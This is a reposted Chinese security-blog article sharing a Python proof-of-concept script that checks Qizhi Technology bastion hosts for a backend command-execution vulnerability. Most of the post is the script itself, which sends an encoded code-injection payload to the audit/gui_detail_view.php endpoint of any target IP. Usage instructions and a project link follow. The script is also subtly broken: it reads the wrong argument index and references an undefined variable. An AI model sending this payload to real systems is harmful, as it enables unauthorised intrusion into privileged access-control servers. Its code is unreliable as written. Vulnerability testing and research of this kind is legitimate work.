Qizhi科技堡垒机后台命令执行漏洞检测

admin 2023年5月18日13:59:44评论82 views字数 1290阅读4分18秒阅读模式

===================================

免责声明

 

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

齐治科技堡垒机-后台命令执行漏洞检测,渗透测试poc

import requests
import sys
import warnings

banner="""
 ______   _ _   _ _             
|  ____| (_) \ | (_)            
| |__ ___ _|  \| |_  __ _  ___  
|  __/ _ \ | . ` | |/ _` |/ _ \ 
| | |  __/ | |\  | | (_| | (_) |
|_|  \___|_|_| \_|_|\__,_|\___/ 
                version:1.7
                
Qizhi-堡垒机后台命令执行漏洞检测脚本
                
"""

warnings.filterwarnings("ignore")

print(banner)

ip = sys.argv[2]
header = {
"user-agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36"
}
payload = "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"

urls = ip + payload

try:
    r = requests.get(url=urls,headers=header,verify=False,timeout=10)
    if "重新登录系统" not in r.text and r.status_code == 200:
        print("\033[0;32;40m[+] {} 疑似存在Qizhi-堡垒机后台命令执行漏洞!!!\033[0m".format(ip))
        print("\033[0;32;40m请利用cookie进一步进行后台命令执行漏洞测试!!\033[0m")
    else:
        print("\033[0;31;40m[-] {} 未发现Qizhi-堡垒机后台命令执行漏洞\033[0m".format(ip))
except Exception as e:
    print("[x] {} 请求失败 ".format(url))

 

0x02 安装与使用

1、使用方法
 python .Qizhi-堡垒机后台命令执行检测.py -u https://xx.xx.xx.xx
2、绿色标记为疑似存在Qizhi-堡垒机后台命令执行漏洞

Qizhi科技堡垒机后台命令执行漏洞检测

3、红色即代表未发现此漏洞

Qizhi科技堡垒机后台命令执行漏洞检测

0x03 项目链接下载

 

https://github.com/FeiNiao/Qizhi-Fortress-machine-Background-command-execution

       

原文始发于微信公众号(网络安全者):Qizhi科技堡垒机后台命令执行漏洞检测

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月18日13:59:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Qizhi科技堡垒机后台命令执行漏洞检测http://cn-sec.com/archives/1743085.html

发表评论

匿名网友 填写信息